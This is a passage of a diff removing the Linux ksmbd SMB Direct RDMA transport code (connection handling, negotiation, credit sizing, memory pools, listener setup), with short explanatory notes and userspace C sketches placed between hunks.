+-		}
+-
+-		ret = get_sg_list(desc_buf, desc_buf_len,
+-				  msg->sgt.sgl, msg->sgt.orig_nents);
+-		if (ret < 0) {
+-			sg_free_table_chained(&msg->sgt, SG_CHUNK_SIZE);
+-			kfree(msg);
+-			goto out;
+-		}
+-
+-		ret = rdma_rw_ctx_init(&msg->rw_ctx, t->qp, t->qp->port,
+-				       msg->sgt.sgl,
+-				       get_buf_page_count(desc_buf, desc_buf_len),
+-				       0,
+-				       le64_to_cpu(desc[i].offset),
+-				       le32_to_cpu(desc[i].token),
+-				       is_read ? DMA_FROM_DEVICE : DMA_TO_DEVICE);
+-		if (ret < 0) {
+-			pr_err("failed to init rdma_rw_ctx: %d\n", ret);
+-			sg_free_table_chained(&msg->sgt, SG_CHUNK_SIZE);
+-			kfree(msg);
+-			goto out;
+-		}
+-
+-		list_add_tail(&msg->list, &msg_list);
+-		desc_buf += desc_buf_len;
+-	}
+-
+-	/* concatenate work requests of rdma_rw_ctxs */
+-	first_wr = NULL;
+-	list_for_each_entry_reverse(msg, &msg_list, list) {
+-		first_wr = rdma_rw_ctx_wrs(&msg->rw_ctx, t->qp, t->qp->port,
+-					   &msg->cqe, first_wr);
+-	}
+-
+-	ret = ib_post_send(t->qp, first_wr, NULL);
+-	if (ret) {
+-		pr_err("failed to post send wr for RDMA R/W: %d\n", ret);
+-		goto out;
+-	}
+-
+-	msg = list_last_entry(&msg_list, struct smb_direct_rdma_rw_msg, list);
+-	wait_for_completion(&completion);
+-	ret = msg->status;
+-out:
+-	list_for_each_entry_safe(msg, next_msg, &msg_list, list) {
+-		list_del(&msg->list);
+-		smb_direct_free_rdma_rw_msg(t, msg,
+-					    is_read ? DMA_FROM_DEVICE : DMA_TO_DEVICE);
+-	}
+-	atomic_add(credits_needed, &t->rw_credits);
+-	wake_up(&t->wait_rw_credits);
+-	return ret;
+-}
+-
+-static int smb_direct_rdma_write(struct ksmbd_transport *t,
+-				 void *buf, unsigned int buflen,
+-				 struct smb2_buffer_desc_v1 *desc,
+-				 unsigned int desc_len)
+-{
+-	return smb_direct_rdma_xmit(smb_trans_direct_transfort(t), buf, buflen,
+-				    desc, desc_len, false);
+-}
+-
+-static int smb_direct_rdma_read(struct ksmbd_transport *t,
+-				void *buf, unsigned int buflen,
+-				struct smb2_buffer_desc_v1 *desc,
+-				unsigned int desc_len)
+-{
+-	return smb_direct_rdma_xmit(smb_trans_direct_transfort(t), buf, buflen,
+-				    desc, desc_len, true);
+-}
+-
+-static void smb_direct_disconnect(struct ksmbd_transport *t)
+-{
+-	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
+-
+-	ksmbd_debug(RDMA, "Disconnecting cm_id=%p\n", st->cm_id);
+-
+-	smb_direct_disconnect_rdma_work(&st->disconnect_work);
+-	wait_event_interruptible(st->wait_status,
+-				 st->status == SMB_DIRECT_CS_DISCONNECTED);
+-	free_transport(st);
+-}
+-
+-static void smb_direct_shutdown(struct ksmbd_transport *t)
+-{
+-	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
+-
+-	ksmbd_debug(RDMA, "smb-direct shutdown cm_id=%p\n", st->cm_id);
+-
+-	smb_direct_disconnect_rdma_work(&st->disconnect_work);
+-}
+-
+-static int smb_direct_cm_handler(struct rdma_cm_id *cm_id,
+-				 struct rdma_cm_event *event)
+-{
+-	struct smb_direct_transport *t = cm_id->context;
+-
+-	ksmbd_debug(RDMA, "RDMA CM event. cm_id=%p event=%s (%d)\n",
+-		    cm_id, rdma_event_msg(event->event), event->event);
+-
+-	switch (event->event) {
+-	case RDMA_CM_EVENT_ESTABLISHED: {
+-		t->status = SMB_DIRECT_CS_CONNECTED;
+-		wake_up_interruptible(&t->wait_status);
+-		break;
+-	}
+-	case RDMA_CM_EVENT_DEVICE_REMOVAL:
+-	case RDMA_CM_EVENT_DISCONNECTED: {
+-		ib_drain_qp(t->qp);
+-
+-		t->status = SMB_DIRECT_CS_DISCONNECTED;
+-		wake_up_interruptible(&t->wait_status);
+-		wake_up_interruptible(&t->wait_reassembly_queue);
+-		wake_up(&t->wait_send_credits);
+-		break;
+-	}
+-	case RDMA_CM_EVENT_CONNECT_ERROR: {
+-		t->status = SMB_DIRECT_CS_DISCONNECTED;
+-		wake_up_interruptible(&t->wait_status);
+-		break;
+-	}
+-	default:
+-		pr_err("Unexpected RDMA CM event. cm_id=%p, event=%s (%d)\n",
+-		       cm_id, rdma_event_msg(event->event),
+-		       event->event);
+-		break;
+-	}
+-	return 0;
+-}
+-
+-static void smb_direct_qpair_handler(struct ib_event *event, void *context)
+-{
+-	struct smb_direct_transport *t = context;
+-
+-	ksmbd_debug(RDMA, "Received QP event. cm_id=%p, event=%s (%d)\n",
+-		    t->cm_id, ib_event_msg(event->event), event->event);
+-
+-	switch (event->event) {
+-	case IB_EVENT_CQ_ERR:
+-	case IB_EVENT_QP_FATAL:
+-		smb_direct_disconnect_rdma_connection(t);
+-		break;
+-	default:
+-		break;
+-	}
+-}
+-
+-static int smb_direct_send_negotiate_response(struct smb_direct_transport *t,
+-					      int failed)
+-{
+-	struct smb_direct_sendmsg *sendmsg;
+-	struct smb_direct_negotiate_resp *resp;
+-	int ret;
+-
+-	sendmsg = smb_direct_alloc_sendmsg(t);
+-	if (IS_ERR(sendmsg))
+-		return -ENOMEM;
+-
+-	resp = (struct smb_direct_negotiate_resp *)sendmsg->packet;
+-	if (failed) {
+-		memset(resp, 0, sizeof(*resp));
+-		resp->min_version = cpu_to_le16(0x0100);
+-		resp->max_version = cpu_to_le16(0x0100);
+-		resp->status = STATUS_NOT_SUPPORTED;
+-	} else {
+-		resp->status = STATUS_SUCCESS;
+-		resp->min_version = SMB_DIRECT_VERSION_LE;
+-		resp->max_version = SMB_DIRECT_VERSION_LE;
+-		resp->negotiated_version = SMB_DIRECT_VERSION_LE;
+-		resp->reserved = 0;
+-		resp->credits_requested =
+-				cpu_to_le16(t->send_credit_target);
+-		resp->credits_granted = cpu_to_le16(manage_credits_prior_sending(t));
+-		resp->max_readwrite_size = cpu_to_le32(t->max_rdma_rw_size);
+-		resp->preferred_send_size = cpu_to_le32(t->max_send_size);
+-		resp->max_receive_size = cpu_to_le32(t->max_recv_size);
+-		resp->max_fragmented_size =
+-				cpu_to_le32(t->max_fragmented_recv_size);
+-	}
+-
+-	sendmsg->sge[0].addr = ib_dma_map_single(t->cm_id->device,
+-						 (void *)resp, sizeof(*resp),
+-						 DMA_TO_DEVICE);
+-	ret = ib_dma_mapping_error(t->cm_id->device, sendmsg->sge[0].addr);
+-	if (ret) {
+-		smb_direct_free_sendmsg(t, sendmsg);
+-		return ret;
+-	}
+-
+-	sendmsg->num_sge = 1;
+-	sendmsg->sge[0].length = sizeof(*resp);
+-	sendmsg->sge[0].lkey = t->pd->local_dma_lkey;
+-
+-	ret = post_sendmsg(t, NULL, sendmsg);
+-	if (ret) {
+-		smb_direct_free_sendmsg(t, sendmsg);
+-		return ret;
+-	}
+-
+-	wait_event(t->wait_send_pending,
+-		   atomic_read(&t->send_pending) == 0);
+-	return 0;
+-}
+-
+-static int smb_direct_accept_client(struct smb_direct_transport *t)
+-{
+-	struct rdma_conn_param conn_param;
+-	struct ib_port_immutable port_immutable;
+-	u32 ird_ord_hdr[2];
+-	int ret;
+-
+-	memset(&conn_param, 0, sizeof(conn_param));
+-	conn_param.initiator_depth = min_t(u8, t->cm_id->device->attrs.max_qp_rd_atom,
+-					   SMB_DIRECT_CM_INITIATOR_DEPTH);
+-	conn_param.responder_resources = 0;
+-
+-	t->cm_id->device->ops.get_port_immutable(t->cm_id->device,
+-						 t->cm_id->port_num,
+-						 &port_immutable);
+-	if (port_immutable.core_cap_flags & RDMA_CORE_PORT_IWARP) {
+-		ird_ord_hdr[0] = conn_param.responder_resources;
+-		ird_ord_hdr[1] = 1;
+-		conn_param.private_data = ird_ord_hdr;
+-		conn_param.private_data_len = sizeof(ird_ord_hdr);
+-	} else {
+-		conn_param.private_data = NULL;
+-		conn_param.private_data_len = 0;
+-	}
+-	conn_param.retry_count = SMB_DIRECT_CM_RETRY;
+-	conn_param.rnr_retry_count = SMB_DIRECT_CM_RNR_RETRY;
+-	conn_param.flow_control = 0;
+-
+-	ret = rdma_accept(t->cm_id, &conn_param);
+-	if (ret) {
+-		pr_err("error at rdma_accept: %d\n", ret);
+-		return ret;
+-	}
+-	return 0;
+-}
+-
+-static int smb_direct_prepare_negotiation(struct smb_direct_transport *t)
+-{
+-	int ret;
+-	struct smb_direct_recvmsg *recvmsg;
+-
+-	recvmsg = get_free_recvmsg(t);
+-	if (!recvmsg)
+-		return -ENOMEM;
+-	recvmsg->type = SMB_DIRECT_MSG_NEGOTIATE_REQ;
+-
+-	ret = smb_direct_post_recv(t, recvmsg);
+-	if (ret) {
+-		pr_err("Can't post recv: %d\n", ret);
+-		goto out_err;
+-	}
+-
+-	t->negotiation_requested = false;
+-	ret = smb_direct_accept_client(t);
+-	if (ret) {
+-		pr_err("Can't accept client\n");
+-		goto out_err;
+-	}
+-
+-	smb_direct_post_recv_credits(&t->post_recv_credits_work.work);
+-	return 0;
+-out_err:
+-	put_recvmsg(t, recvmsg);
+-	return ret;
+-}
+-
+-static unsigned int smb_direct_get_max_fr_pages(struct smb_direct_transport *t)
+-{
+-	return min_t(unsigned int,
+-		     t->cm_id->device->attrs.max_fast_reg_page_list_len,
+-		     256);
+-}
+-
+-static int smb_direct_init_params(struct smb_direct_transport *t,
+-				  struct ib_qp_cap *cap)
+-{
+-	struct ib_device *device = t->cm_id->device;
+-	int max_send_sges, max_rw_wrs, max_send_wrs;
+-	unsigned int max_sge_per_wr, wrs_per_credit;
+-
+-	/* Need 3 more SGEs, because an SMB_DIRECT header, an SMB2 header,
+-	 * and an SMB2 response could be mapped.
+-	 */
+-	t->max_send_size = smb_direct_max_send_size;
+-	max_send_sges = DIV_ROUND_UP(t->max_send_size, PAGE_SIZE) + 3;
+-	if (max_send_sges > SMB_DIRECT_MAX_SEND_SGES) {
+-		pr_err("max_send_size %d is too large\n", t->max_send_size);
+-		return -EINVAL;
+-	}
+-
+-	/* Calculate the number of work requests for RDMA R/W.
+-	 * The maximum number of pages that can be registered with
+-	 * one memory region can be transferred with one R/W credit,
+-	 * and at least 4 work requests per credit are needed for MR
+-	 * registration, the RDMA R/W itself, and local & remote MR
+-	 * invalidation.
+-	 */
+-	t->max_rdma_rw_size = smb_direct_max_read_write_size;
+-	t->pages_per_rw_credit = smb_direct_get_max_fr_pages(t);
+-	t->max_rw_credits = DIV_ROUND_UP(t->max_rdma_rw_size,
+-					 (t->pages_per_rw_credit - 1) *
+-					 PAGE_SIZE);
+-
+-	max_sge_per_wr = min_t(unsigned int, device->attrs.max_send_sge,
+-			       device->attrs.max_sge_rd);
+-	max_sge_per_wr = max_t(unsigned int, max_sge_per_wr,
+-			       max_send_sges);
+-	wrs_per_credit = max_t(unsigned int, 4,
+-			       DIV_ROUND_UP(t->pages_per_rw_credit,
+-					    max_sge_per_wr) + 1);
+-	max_rw_wrs = t->max_rw_credits * wrs_per_credit;
+-
+-	max_send_wrs = smb_direct_send_credit_target + max_rw_wrs;
+-	if (max_send_wrs > device->attrs.max_cqe ||
+-	    max_send_wrs > device->attrs.max_qp_wr) {
+-		pr_err("consider lowering send_credit_target = %d\n",
+-		       smb_direct_send_credit_target);
+-		pr_err("Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
+-		       device->attrs.max_cqe, device->attrs.max_qp_wr);
+-		return -EINVAL;
+-	}
+-
+-	if (smb_direct_receive_credit_max > device->attrs.max_cqe ||
+-	    smb_direct_receive_credit_max > device->attrs.max_qp_wr) {
+-		pr_err("consider lowering receive_credit_max = %d\n",
+-		       smb_direct_receive_credit_max);
+-		pr_err("Possible CQE overrun, device reporting max_cqe %d max_qp_wr %d\n",
+-		       device->attrs.max_cqe, device->attrs.max_qp_wr);
+-		return -EINVAL;
+-	}
+-
+-	if (device->attrs.max_recv_sge < SMB_DIRECT_MAX_RECV_SGES) {
+-		pr_err("warning: device max_recv_sge = %d too small\n",
+-		       device->attrs.max_recv_sge);
+-		return -EINVAL;
+-	}
+-
+-	t->recv_credits = 0;
+-	t->count_avail_recvmsg = 0;
+-
+-	t->recv_credit_max = smb_direct_receive_credit_max;
+-	t->recv_credit_target = 10;
+-	t->new_recv_credits = 0;
+-
+-	t->send_credit_target = smb_direct_send_credit_target;
+-	atomic_set(&t->send_credits, 0);
+-	atomic_set(&t->rw_credits, t->max_rw_credits);
+-
+-	t->max_send_size = smb_direct_max_send_size;
+-	t->max_recv_size = smb_direct_max_receive_size;
+-	t->max_fragmented_recv_size = smb_direct_max_fragmented_recv_size;
+-
+-	cap->max_send_wr = max_send_wrs;
+-	cap->max_recv_wr = t->recv_credit_max;
+-	cap->max_send_sge = max_sge_per_wr;
+-	cap->max_recv_sge = SMB_DIRECT_MAX_RECV_SGES;
+-	cap->max_inline_data = 0;
+-	cap->max_rdma_ctxs = t->max_rw_credits;
+-	return 0;
+-}
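
The sizing above boils down to simple arithmetic: one R/W credit moves at most (pages_per_rw_credit - 1) pages of payload, since a non-page-aligned buffer can waste one page, and the credit count follows by dividing the largest RDMA read/write by that figure. A minimal userspace sketch of the calculation, assuming 4 KiB pages and the SMBD_DEFAULT_IOSIZE of 8 MiB rather than values from a live device:

#include <stdio.h>

#define DIV_ROUND_UP(n, d) (((n) + (d) - 1) / (d))

int main(void)
{
	const unsigned int page_size = 4096;           /* assumption: 4 KiB pages */
	const unsigned int max_rdma_rw_size = 8 << 20; /* SMBD_DEFAULT_IOSIZE */
	const unsigned int pages_per_rw_credit = 256;  /* cap used by smb_direct_get_max_fr_pages() */

	/* One page per credit is reserved for an unaligned start. */
	unsigned int usable = (pages_per_rw_credit - 1) * page_size;
	unsigned int max_rw_credits = DIV_ROUND_UP(max_rdma_rw_size, usable);

	printf("bytes per credit: %u, credits needed: %u\n", usable, max_rw_credits);
	return 0;
}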
+-
+-static void smb_direct_destroy_pools(struct smb_direct_transport *t)
+-{
+-	struct smb_direct_recvmsg *recvmsg;
+-
+-	while ((recvmsg = get_free_recvmsg(t)))
+-		mempool_free(recvmsg, t->recvmsg_mempool);
+-	while ((recvmsg = get_empty_recvmsg(t)))
+-		mempool_free(recvmsg, t->recvmsg_mempool);
+-
+-	mempool_destroy(t->recvmsg_mempool);
+-	t->recvmsg_mempool = NULL;
+-
+-	kmem_cache_destroy(t->recvmsg_cache);
+-	t->recvmsg_cache = NULL;
+-
+-	mempool_destroy(t->sendmsg_mempool);
+-	t->sendmsg_mempool = NULL;
+-
+-	kmem_cache_destroy(t->sendmsg_cache);
+-	t->sendmsg_cache = NULL;
+-}
+-
+-static int smb_direct_create_pools(struct smb_direct_transport *t)
+-{
+-	char name[80];
+-	int i;
+-	struct smb_direct_recvmsg *recvmsg;
+-
+-	snprintf(name, sizeof(name), "smb_direct_rqst_pool_%p", t);
+-	t->sendmsg_cache = kmem_cache_create(name,
+-					     sizeof(struct smb_direct_sendmsg) +
+-					      sizeof(struct smb_direct_negotiate_resp),
+-					     0, SLAB_HWCACHE_ALIGN, NULL);
+-	if (!t->sendmsg_cache)
+-		return -ENOMEM;
+-
+-	t->sendmsg_mempool = mempool_create(t->send_credit_target,
+-					    mempool_alloc_slab, mempool_free_slab,
+-					    t->sendmsg_cache);
+-	if (!t->sendmsg_mempool)
+-		goto err;
+-
+-	snprintf(name, sizeof(name), "smb_direct_resp_%p", t);
+-	t->recvmsg_cache = kmem_cache_create(name,
+-					     sizeof(struct smb_direct_recvmsg) +
+-					      t->max_recv_size,
+-					     0, SLAB_HWCACHE_ALIGN, NULL);
+-	if (!t->recvmsg_cache)
+-		goto err;
+-
+-	t->recvmsg_mempool =
+-		mempool_create(t->recv_credit_max, mempool_alloc_slab,
+-			       mempool_free_slab, t->recvmsg_cache);
+-	if (!t->recvmsg_mempool)
+-		goto err;
+-
+-	INIT_LIST_HEAD(&t->recvmsg_queue);
+-
+-	for (i = 0; i < t->recv_credit_max; i++) {
+-		recvmsg = mempool_alloc(t->recvmsg_mempool, GFP_KERNEL);
+-		if (!recvmsg)
+-			goto err;
+-		recvmsg->transport = t;
+-		list_add(&recvmsg->list, &t->recvmsg_queue);
+-	}
+-	t->count_avail_recvmsg = t->recv_credit_max;
+-
+-	return 0;
+-err:
+-	smb_direct_destroy_pools(t);
+-	return -ENOMEM;
+-}
+-
+-static int smb_direct_create_qpair(struct smb_direct_transport *t,
+-				   struct ib_qp_cap *cap)
+-{
+-	int ret;
+-	struct ib_qp_init_attr qp_attr;
+-	int pages_per_rw;
+-
+-	t->pd = ib_alloc_pd(t->cm_id->device, 0);
+-	if (IS_ERR(t->pd)) {
+-		pr_err("Can't create RDMA PD\n");
+-		ret = PTR_ERR(t->pd);
+-		t->pd = NULL;
+-		return ret;
+-	}
+-
+-	t->send_cq = ib_alloc_cq(t->cm_id->device, t,
+-				 smb_direct_send_credit_target + cap->max_rdma_ctxs,
+-				 0, IB_POLL_WORKQUEUE);
+-	if (IS_ERR(t->send_cq)) {
+-		pr_err("Can't create RDMA send CQ\n");
+-		ret = PTR_ERR(t->send_cq);
+-		t->send_cq = NULL;
+-		goto err;
+-	}
+-
+-	t->recv_cq = ib_alloc_cq(t->cm_id->device, t,
+-				 t->recv_credit_max, 0, IB_POLL_WORKQUEUE);
+-	if (IS_ERR(t->recv_cq)) {
+-		pr_err("Can't create RDMA recv CQ\n");
+-		ret = PTR_ERR(t->recv_cq);
+-		t->recv_cq = NULL;
+-		goto err;
+-	}
+-
+-	memset(&qp_attr, 0, sizeof(qp_attr));
+-	qp_attr.event_handler = smb_direct_qpair_handler;
+-	qp_attr.qp_context = t;
+-	qp_attr.cap = *cap;
+-	qp_attr.sq_sig_type = IB_SIGNAL_REQ_WR;
+-	qp_attr.qp_type = IB_QPT_RC;
+-	qp_attr.send_cq = t->send_cq;
+-	qp_attr.recv_cq = t->recv_cq;
+-	qp_attr.port_num = ~0;
+-
+-	ret = rdma_create_qp(t->cm_id, t->pd, &qp_attr);
+-	if (ret) {
+-		pr_err("Can't create RDMA QP: %d\n", ret);
+-		goto err;
+-	}
+-
+-	t->qp = t->cm_id->qp;
+-	t->cm_id->event_handler = smb_direct_cm_handler;
+-
+-	pages_per_rw = DIV_ROUND_UP(t->max_rdma_rw_size, PAGE_SIZE) + 1;
+-	if (pages_per_rw > t->cm_id->device->attrs.max_sgl_rd) {
+-		ret = ib_mr_pool_init(t->qp, &t->qp->rdma_mrs,
+-				      t->max_rw_credits, IB_MR_TYPE_MEM_REG,
+-				      t->pages_per_rw_credit, 0);
+-		if (ret) {
+-			pr_err("failed to init mr pool count %d pages %d\n",
+-			       t->max_rw_credits, t->pages_per_rw_credit);
+-			goto err;
+-		}
+-	}
+-
+-	return 0;
+-err:
+-	if (t->qp) {
+-		ib_destroy_qp(t->qp);
+-		t->qp = NULL;
+-	}
+-	if (t->recv_cq) {
+-		ib_destroy_cq(t->recv_cq);
+-		t->recv_cq = NULL;
+-	}
+-	if (t->send_cq) {
+-		ib_destroy_cq(t->send_cq);
+-		t->send_cq = NULL;
+-	}
+-	if (t->pd) {
+-		ib_dealloc_pd(t->pd);
+-		t->pd = NULL;
+-	}
+-	return ret;
+-}
+-
+-static int smb_direct_prepare(struct ksmbd_transport *t)
+-{
+-	struct smb_direct_transport *st = smb_trans_direct_transfort(t);
+-	struct smb_direct_recvmsg *recvmsg;
+-	struct smb_direct_negotiate_req *req;
+-	int ret;
+-
+-	ksmbd_debug(RDMA, "Waiting for SMB_DIRECT negotiate request\n");
+-	ret = wait_event_interruptible_timeout(st->wait_status,
+-					       st->negotiation_requested ||
+-					       st->status == SMB_DIRECT_CS_DISCONNECTED,
+-					       SMB_DIRECT_NEGOTIATE_TIMEOUT * HZ);
+-	if (ret <= 0 || st->status == SMB_DIRECT_CS_DISCONNECTED)
+-		return ret < 0 ? ret : -ETIMEDOUT;
+-
+-	recvmsg = get_first_reassembly(st);
+-	if (!recvmsg)
+-		return -ECONNABORTED;
+-
+-	ret = smb_direct_check_recvmsg(recvmsg);
+-	if (ret == -ECONNABORTED)
+-		goto out;
+-
+-	req = (struct smb_direct_negotiate_req *)recvmsg->packet;
+-	st->max_recv_size = min_t(int, st->max_recv_size,
+-				  le32_to_cpu(req->preferred_send_size));
+-	st->max_send_size = min_t(int, st->max_send_size,
+-				  le32_to_cpu(req->max_receive_size));
+-	st->max_fragmented_send_size =
+-		le32_to_cpu(req->max_fragmented_size);
+-	st->max_fragmented_recv_size =
+-		(st->recv_credit_max * st->max_recv_size) / 2;
+-
+-	ret = smb_direct_send_negotiate_response(st, ret);
+-out:
+-	spin_lock_irq(&st->reassembly_queue_lock);
+-	st->reassembly_queue_length--;
+-	list_del(&recvmsg->list);
+-	spin_unlock_irq(&st->reassembly_queue_lock);
+-	put_recvmsg(st, recvmsg);
+-
+-	return ret;
+-}
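
The negotiation above is essentially a pair of min() clamps plus one derived limit. A hedged sketch of the same dance on plain integers, with invented peer values (field names mirror struct smb_direct_negotiate_req; server defaults are assumptions):

#include <stdio.h>

static unsigned int min_u32(unsigned int a, unsigned int b)
{
	return a < b ? a : b;
}

int main(void)
{
	unsigned int max_recv_size = 8192;   /* assumed server default */
	unsigned int max_send_size = 8192;   /* assumed server default */
	unsigned int recv_credit_max = 255;  /* assumed receive credit cap */

	/* Invented values from a peer's negotiate request. */
	unsigned int peer_preferred_send_size = 1364;
	unsigned int peer_max_receive_size = 8192;

	/* Never receive more than the peer sends, never send more than it accepts. */
	max_recv_size = min_u32(max_recv_size, peer_preferred_send_size);
	max_send_size = min_u32(max_send_size, peer_max_receive_size);

	/* Reassembly limit: half of what all posted receives could hold. */
	unsigned int frag_recv = (recv_credit_max * max_recv_size) / 2;

	printf("recv %u, send %u, fragmented recv %u\n",
	       max_recv_size, max_send_size, frag_recv);
	return 0;
}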
+-
+-static int smb_direct_connect(struct smb_direct_transport *st)
+-{
+-	int ret;
+-	struct ib_qp_cap qp_cap;
+-
+-	ret = smb_direct_init_params(st, &qp_cap);
+-	if (ret) {
+-		pr_err("Can't configure RDMA parameters\n");
+-		return ret;
+-	}
+-
+-	ret = smb_direct_create_pools(st);
+-	if (ret) {
+-		pr_err("Can't init RDMA pool: %d\n", ret);
+-		return ret;
+-	}
+-
+-	ret = smb_direct_create_qpair(st, &qp_cap);
+-	if (ret) {
+-		pr_err("Can't accept RDMA client: %d\n", ret);
+-		return ret;
+-	}
+-
+-	ret = smb_direct_prepare_negotiation(st);
+-	if (ret) {
+-		pr_err("Can't negotiate: %d\n", ret);
+-		return ret;
+-	}
+-	return 0;
+-}
+-
+-static bool rdma_frwr_is_supported(struct ib_device_attr *attrs)
+-{
+-	if (!(attrs->device_cap_flags & IB_DEVICE_MEM_MGT_EXTENSIONS))
+-		return false;
+-	if (attrs->max_fast_reg_page_list_len == 0)
+-		return false;
+-	return true;
+-}
+-
+-static int smb_direct_handle_connect_request(struct rdma_cm_id *new_cm_id)
+-{
+-	struct smb_direct_transport *t;
+-	int ret;
+-
+-	if (!rdma_frwr_is_supported(&new_cm_id->device->attrs)) {
+-		ksmbd_debug(RDMA,
+-			    "Fast Registration Work Requests are not supported. Device capabilities=%llx\n",
+-			    new_cm_id->device->attrs.device_cap_flags);
+-		return -EPROTONOSUPPORT;
+-	}
+-
+-	t = alloc_transport(new_cm_id);
+-	if (!t)
+-		return -ENOMEM;
+-
+-	ret = smb_direct_connect(t);
+-	if (ret)
+-		goto out_err;
+-
+-	KSMBD_TRANS(t)->handler = kthread_run(ksmbd_conn_handler_loop,
+-					      KSMBD_TRANS(t)->conn, "ksmbd:r%u",
+-					      smb_direct_port);
+-	if (IS_ERR(KSMBD_TRANS(t)->handler)) {
+-		ret = PTR_ERR(KSMBD_TRANS(t)->handler);
+-		pr_err("Can't start thread\n");
+-		goto out_err;
+-	}
+-
+-	return 0;
+-out_err:
+-	free_transport(t);
+-	return ret;
+-}
+-
+-static int smb_direct_listen_handler(struct rdma_cm_id *cm_id,
+-				     struct rdma_cm_event *event)
+-{
+-	switch (event->event) {
+-	case RDMA_CM_EVENT_CONNECT_REQUEST: {
+-		int ret = smb_direct_handle_connect_request(cm_id);
+-
+-		if (ret) {
+-			pr_err("Can't create transport: %d\n", ret);
+-			return ret;
+-		}
+-
+-		ksmbd_debug(RDMA, "Received connection request. cm_id=%p\n",
+-			    cm_id);
+-		break;
+-	}
+-	default:
+-		pr_err("Unexpected listen event. cm_id=%p, event=%s (%d)\n",
+-		       cm_id, rdma_event_msg(event->event), event->event);
+-		break;
+-	}
+-	return 0;
+-}
+-
+-static int smb_direct_listen(int port)
+-{
+-	int ret;
+-	struct rdma_cm_id *cm_id;
+-	struct sockaddr_in sin = {
+-		.sin_family		= AF_INET,
+-		.sin_addr.s_addr	= htonl(INADDR_ANY),
+-		.sin_port		= htons(port),
+-	};
+-
+-	cm_id = rdma_create_id(&init_net, smb_direct_listen_handler,
+-			       &smb_direct_listener, RDMA_PS_TCP, IB_QPT_RC);
+-	if (IS_ERR(cm_id)) {
+-		pr_err("Can't create cm id: %ld\n", PTR_ERR(cm_id));
+-		return PTR_ERR(cm_id);
+-	}
+-
+-	ret = rdma_bind_addr(cm_id, (struct sockaddr *)&sin);
+-	if (ret) {
+-		pr_err("Can't bind: %d\n", ret);
+-		goto err;
+-	}
+-
+-	smb_direct_listener.cm_id = cm_id;
+-
+-	ret = rdma_listen(cm_id, 10);
+-	if (ret) {
+-		pr_err("Can't listen: %d\n", ret);
+-		goto err;
+-	}
+-	return 0;
+-err:
+-	smb_direct_listener.cm_id = NULL;
+-	rdma_destroy_id(cm_id);
+-	return ret;
+-}
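
The kernel-side rdma_create_id()/rdma_bind_addr()/rdma_listen() sequence has a close userspace analogue in librdmacm, which can help when experimenting with a listener outside the kernel. A hedged sketch (assumes librdmacm is installed and an RDMA-capable device is present; error handling trimmed):

/* cc smbd_listen.c -lrdmacm */
#include <stdio.h>
#include <string.h>
#include <netinet/in.h>
#include <rdma/rdma_cma.h>

int main(void)
{
	struct rdma_event_channel *ec = rdma_create_event_channel();
	struct rdma_cm_id *id;
	struct sockaddr_in sin;

	if (!ec || rdma_create_id(ec, &id, NULL, RDMA_PS_TCP))
		return 1;

	memset(&sin, 0, sizeof(sin));
	sin.sin_family = AF_INET;
	sin.sin_addr.s_addr = htonl(INADDR_ANY);
	sin.sin_port = htons(5445);	/* SMB_DIRECT_PORT_IWARP */

	if (rdma_bind_addr(id, (struct sockaddr *)&sin) || rdma_listen(id, 10))
		return 1;

	/* Connection requests now arrive as RDMA_CM_EVENT_CONNECT_REQUEST
	 * events on ec; fetch them with rdma_get_cm_event(). */
	puts("listening");
	rdma_destroy_id(id);
	rdma_destroy_event_channel(ec);
	return 0;
}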
+-
+-static int smb_direct_ib_client_add(struct ib_device *ib_dev)
+-{
+-	struct smb_direct_device *smb_dev;
+-
+-	/* Use port 5445 if the device type is iWARP (not IB) */
+-	if (ib_dev->node_type != RDMA_NODE_IB_CA)
+-		smb_direct_port = SMB_DIRECT_PORT_IWARP;
+-
+-	if (!ib_dev->ops.get_netdev ||
+-	    !rdma_frwr_is_supported(&ib_dev->attrs))
+-		return 0;
+-
+-	smb_dev = kzalloc(sizeof(*smb_dev), GFP_KERNEL);
+-	if (!smb_dev)
+-		return -ENOMEM;
+-	smb_dev->ib_dev = ib_dev;
+-
+-	write_lock(&smb_direct_device_lock);
+-	list_add(&smb_dev->list, &smb_direct_device_list);
+-	write_unlock(&smb_direct_device_lock);
+-
+-	ksmbd_debug(RDMA, "ib device added: name %s\n", ib_dev->name);
+-	return 0;
+-}
+-
+-static void smb_direct_ib_client_remove(struct ib_device *ib_dev,
+-					void *client_data)
+-{
+-	struct smb_direct_device *smb_dev, *tmp;
+-
+-	write_lock(&smb_direct_device_lock);
+-	list_for_each_entry_safe(smb_dev, tmp, &smb_direct_device_list, list) {
+-		if (smb_dev->ib_dev == ib_dev) {
+-			list_del(&smb_dev->list);
+-			kfree(smb_dev);
+-			break;
+-		}
+-	}
+-	write_unlock(&smb_direct_device_lock);
+-}
+-
+-static struct ib_client smb_direct_ib_client = {
+-	.name	= "ksmbd_smb_direct_ib",
+-	.add	= smb_direct_ib_client_add,
+-	.remove	= smb_direct_ib_client_remove,
+-};
+-
+-int ksmbd_rdma_init(void)
+-{
+-	int ret;
+-
+-	smb_direct_listener.cm_id = NULL;
+-
+-	ret = ib_register_client(&smb_direct_ib_client);
+-	if (ret) {
+-		pr_err("failed to ib_register_client\n");
+-		return ret;
+-	}
+-
+-	/* When a client is running out of send credits, the credits are
+-	 * granted by the server sending a packet using this queue.
+-	 * This avoids the situation where a client cannot send packets
+-	 * for lack of credits.
+-	 */
+-	smb_direct_wq = alloc_workqueue("ksmbd-smb_direct-wq",
+-					WQ_HIGHPRI | WQ_MEM_RECLAIM, 0);
+-	if (!smb_direct_wq)
+-		return -ENOMEM;
+-
+-	ret = smb_direct_listen(smb_direct_port);
+-	if (ret) {
+-		destroy_workqueue(smb_direct_wq);
+-		smb_direct_wq = NULL;
+-		pr_err("Can't listen: %d\n", ret);
+-		return ret;
+-	}
+-
+-	ksmbd_debug(RDMA, "init RDMA listener. cm_id=%p\n",
+-		    smb_direct_listener.cm_id);
+-	return 0;
+-}
+-
+-void ksmbd_rdma_destroy(void)
+-{
+-	if (!smb_direct_listener.cm_id)
+-		return;
+-
+-	ib_unregister_client(&smb_direct_ib_client);
+-	rdma_destroy_id(smb_direct_listener.cm_id);
+-
+-	smb_direct_listener.cm_id = NULL;
+-
+-	if (smb_direct_wq) {
+-		destroy_workqueue(smb_direct_wq);
+-		smb_direct_wq = NULL;
+-	}
+-}
+-
+-bool ksmbd_rdma_capable_netdev(struct net_device *netdev)
+-{
